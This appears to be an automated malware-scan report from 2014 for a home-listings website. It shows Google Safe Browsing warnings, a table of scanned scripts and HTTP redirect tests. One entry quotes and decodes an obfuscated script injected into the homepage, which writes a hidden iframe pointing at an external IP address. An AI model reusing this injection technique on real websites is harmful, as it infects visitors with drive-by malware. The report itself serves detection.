Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sandyspringsgeorgiahomes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sandyspringsgeorgiahomes.com/ | 200 OK Content-Length: 5532 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: he-is-she.co.cc y=0;while(y<123)document.write(String.fromCharCode('=jgsbnf!tsd>#iuuq;00if.jt.tif/dp/dd0xfc0tfbsdi/qiq#!xjeui>#511#!ifjhiu>#511#!gsbnfcpsefs>#2#!tuzmf>#ejtqmbz;opof#?=0jgsbnf?'.charCodeAt(y++)-1)) Decoded script: <iframe name='35b1df713c2' src='http://188.143.232.156/test' width=449 height=107 style='display:none'></iframe> | ||
http://adfusionnetwork.com/?campaignid=135324812&type=tracking | 200 OK Content-Length: 12436 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client.js | 200 OK Content-Length: 1723 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/domain_parking.js | 200 OK Content-Length: 174780 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/ci.js | 200 OK Content-Length: 71507 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/caf.js | 200 OK Content-Length: 8900 Content-Type: application/x-javascript | clean |
http://adfusionnetwork.com/test404page.js | 403 Forbidden Content-Length: 1147 Content-Type: text/html | clean |
http://mediamindcal.com/?campaignid=12451598&type=tracking | 200 OK Content-Length: 978 Content-Type: text/html | clean |
http://mediamindcal.com/?ga=7zLMLVYFIr9XihyTLYaQmtg0q%2FqY8TTWW07kDWl87giOmfJGUcJDpTKaM07XdgwHqHRwFNrztq5EMvR6zX2U%2FA%3D%3D&gerf=5L%2FFGnAqhyOTM7vsLQdoRgORhLBtUKKE18LJWIMQqnM%3D&guro=rwBd813lt%2BuydBopjSNbyeLPMqYU7YsjSkSX9waO0mb4iUBLSYSH9lo1LFyxGYP9WqoM9%2B64d9BUU6fOlSzhuV0FAv4vvCS9j7uRGv1rV3k%3D&campaignid=12451598&type=tracking | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: Keep-Alive Date: Fri, 26 Dec 2014 17:21:39 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=127 Set-Cookie: gvc=901vr1671600994330548; expires=Wed, 25-Dec-2019 17:21:39 GMT; path=/; domain=mediamindcal.com; httponly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKrfIMFkSaoTSqKmC+BrghK0CpDHc0MuVzmMHin8LIORhpXbped+iYhSnZurWnEO0zcKcVIrzp026LVc5pMB9bUCAwEAAQ==_I6AEH5Jry+YkNeqNZHOQeIuWvCcpUQDlI7wg7l8tnQdle1THVxa/lsa/UEfCdabgJ1cLYnmqdPxMr8EhGU9KpQ== | clean |
http://mediamindcal.com/rg-erdr.php?_rpo=t | HTTP/1.1 302 Found Connection: Keep-Alive Date: Fri, 26 Dec 2014 17:21:41 GMT Location: http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=mediamindcal.com&channel=&drid=&output=html Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=106 | clean |
http://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?client=&domain_name=mediamindcal.com&channel=&drid=&output=html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sandyspringsgeorgiahomes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 17:21:25 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5532
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:25:30 GMT
...5532 bytes of data.
GET / HTTP/1.1
Host: sandyspringsgeorgiahomes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 17:21:25 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 5532
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:25:30 GMT
...5532 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sandyspringsgeorgiahomes.com
Referer: http://www.google.com/search?q=sandyspringsgeorgiahomes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sandyspringsgeorgiahomes.com
Referer: http://www.google.com/search?q=sandyspringsgeorgiahomes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.